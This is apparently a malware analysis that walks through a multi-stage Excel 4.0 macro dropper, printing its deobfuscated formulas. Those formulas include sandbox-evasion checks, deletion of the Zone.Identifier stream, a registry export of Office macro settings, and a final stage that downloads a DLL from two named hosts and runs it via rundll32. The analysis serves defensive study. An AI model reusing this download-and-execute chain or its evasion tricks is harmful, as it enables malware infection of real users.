This multi-stage XLM downloads the second stage payload, only if an internet connection is present. It contains anti-analysis tricks, such as checking the real sleep length and removes second stage origin artifacts, such as the zone identifier.
SHA-256: 5f2adacaf4ecb00ed24dd9dfe355307d0d6e786e40c945ad4c6d1ae3a4835d2a Report: https://www.filescan.io/uploads/61fd39b19046890c53adaa11/reports/f0412948-2f44-4ad2-ad51-31d347e9dd56/overview
- Stage 1: the entrypoint stage,
FORMULA(crack)
is the key cell to creating the next stage.
C51 pound=(VALUE("0"))
C52 =WHILE(pound<30)
C55 =COUNT(R46C3:R85C10)
C56 arrivals=-1
C60 pound=pound+1
C61 crack=""
C63 =WHILE(arrivals<196)
C64 arrivals=arrivals+1
C65 =INDIRECT(ADDRESS(arrivals+56,18+pound))
C66 =IF(R65C3="ikhTQSvvltISB",SET.NAME("arrivals",196),SET.NAME("crack",crack&R65C3))
C68 =NEXT()
C72 =FORMULA(crack,ABSREF("R["&(pound-1)&"]C[0]",R79C3))
C73 =COUNT(R28C1:R75C2)
C74
C75 =NEXT()
- Stage 2.
FORMULA(competent)
is the key cell to creating the next stage.
[=GOTO(R102C3)] ' jump to `[attacked=R80C3]`
[bench=0]
[athletes=0]
[grove=ROWS(cookies)]
[=WHILE(athletes<bottom)]
[ticket=-1]
[athletes=athletes+1]
[competent=""]
[=WHILE(ticket<500)]
[ticket=ticket+1]
[=INDIRECT(ADDRESS(ticket+loads,athletes+instruction,,,"Sheet1"))]
[=IF(R89C3>1000)]
[ticket=500]
[=ELSE()]
[healthy=MOD(bench,grove)+1]
[volunteers=INDEX(cookies,healthy)]
[bench=bench+1]
[competent=competent&CHAR(R89C3-volunteers)]
[=END.IF()]
[=NEXT()]
[=FORMULA(competent,ABSREF("R["&(athletes-1)&"]C[0]",positions))]
[=NEXT()]
[=RETURN()]
[attacked=R80C3]
[loads=99]
[instruction=5]
[cookies=R68C11:R77C11] ' this fomula endswith :R77C11
[bottom=17]
[positions=R109C3]
[=attacked()] ' back to [bench=0]
- Stage 3: re-using
attacked()
function. The formula variable is stillcompetent
.
[=FORMULA(INT(ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."))+-309,R78C11)] ' ALERT should return TRUE, INT(TRUE) = -1
R110C3: [=ERROR(TRUE,R112C3)] ' install an error handler cell R112C3
R111C3: [=FORMULA(INT(FILE.DELETE(GET.DOCUMENT(2)&"\"&GET.WINDOW(31)&":Zone.Identifier"))+56,R79C11)] ' delete extended stream :Zone.Identifier, which will be created by browser if the file is downloaded from the internet
R112C3: [=IF(ISERROR(R111C3),CLOSE(FALSE),)] ' if not downloaded from internet it will CLOSE the file and wont move forward, this is why it cannot be caught in an offline environment
[=FORMULA(INT(CALL("Xlcall32","Excel4","2JRJRR#",4,,2,288,65)=353)+-656,R80C11)] ' Xlcall32.Excel4(4, 288, 65) invoke excel function SUM(288, 65), got 353
[=APP.MAXIMIZE()]
[=FORMULA(INT(AND(ISNUMBER(SEARCH("Win",GET.WORKSPACE(1))),GET.WORKSPACE(14)>390,GET.WORKSPACE(42),GET.WORKSPACE(19),GET.WORKSPACE(13)>800))+316,R81C11)]
[=NOW()]
[=WAIT(NOW()+"00:00:01")]
[=NOW()] ' a well known XLM trick NOW(); WAIT(); NOW(), subtract to ensure WAIT really happened
[=FORMULA(INT((R118C3-R116C3)*100000>1)+320,R82C11)]
[loads=99]
[instruction=22]
[cookies=R78C11:R82C11]
[bottom=24]
[positions=R126C3]
[=attacked()]
- Stage 4
[p="C:\Users\Public\Documents\"]
[=FOPEN(p&"wa4.txt",3)]
[=WHILE(FSIZE(R127C3)<7746)]
[=FWRITE(R127C3,CHAR(RANDBETWEEN(33,125)))]
[=NEXT()]
[=FORMULA(INT(FSIZE(R127C3)=7746)+29,R83C11)]
[=FCLOSE(R127C3)]
[="EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security "&p&"icSz4h.txt /y"]
[=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe",R133C3,0,5)]
[=WHILE(ISERROR(FILES(p&"icSz4h.txt")))]
[=WAIT(NOW()+"00:00:01")]
[=NEXT()]
[=FOPEN(p&"icSz4h.txt")]
[=FPOS(R138C3,215)]
[=FREAD(R138C3,255)]
[=FCLOSE(R138C3)]
[=FILE.DELETE(p&"icSz4h.txt")]
[=FORMULA(INT(ISNUMBER(SEARCH("""VBAWarnings""=dword:00000001",R140C3)))+301,R84C11)]
[loads=99]
[instruction=46]
[cookies=R78C11:R84C11]
[bottom=9]
[positions=R150C3]
[=attacked()]
- Stage 5
[zzz="https://hrdgschool.com/logs.php"]
[xxx="https://allied-almansoor.com/logs.php"]
[=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,zzz,p&"f4myZ.txt",0,0)]
[=IF(R152C3<>0,,GOTO(R155C3))]
[=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,xxx,p&"f4myZ.txt",0,0)]
[a="ShellExecuteA"]
[b="C:\Windows\system32\rundll32.exe"]
[=CALL("Shell32",a,"JJCCCJJ",0,"open",b,p&"f4myZ.txt,DllRegisterServer ",0,5)]
[=CLOSE(FALSE)]